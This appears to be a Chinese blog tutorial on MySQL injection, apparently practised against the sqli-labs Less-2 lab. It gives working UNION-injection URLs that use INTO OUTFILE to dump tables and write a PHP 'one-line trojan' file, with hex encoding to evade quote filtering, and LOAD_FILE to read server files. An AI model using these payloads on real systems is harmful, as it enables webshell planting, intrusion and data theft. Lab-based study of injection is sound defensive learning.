Mysql注入 -- 数据库导出及读文件 - Kirin博客

Mysql注入 -- 数据库导出及读文件

作者: Bee

全网最全的网络资源分享网站

标签:

mysql注入

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

流量卡广告 Kirin影视 联系站长QQ

一、数据库导出文件

1、连接数据库

2、通过into outfile导出数据库内容

select * from users into outfile "c:/1.sql";


3、通过into outfile语句,在C盘目录写入一句话木马

select '<?php phpinfo();?>' into outfile "c:/aiyou.php";


4、通过实例导出一句话,避免单引号问题,可以将一句话内容编码为十六进制

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,'<?php phpinfo();?>' into outfile 'c:/aiyou.php' --+http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'c:/aiyou.php' --+


提示:

导入文件需要修改mysql的一个参数值,打开my.cnf 或 my.ini,加入以下语句后重启mysql。

secure_file_priv=''



二、读文件

1、连接Mysql数据库,读取C盘的aiyou.php内容

select load_file("c:/aiyou.php");


2、通过联合查询,将读到的内容显示出来,为避免引号的问题,将路径编码为十六进制

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file("c:/1.sql");http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file(0x633a2f312e73716c) --+



禁止非法,后果自负

分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《Mysql注入 -- 数据库导出及读文件》 发布于2021-5-15

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫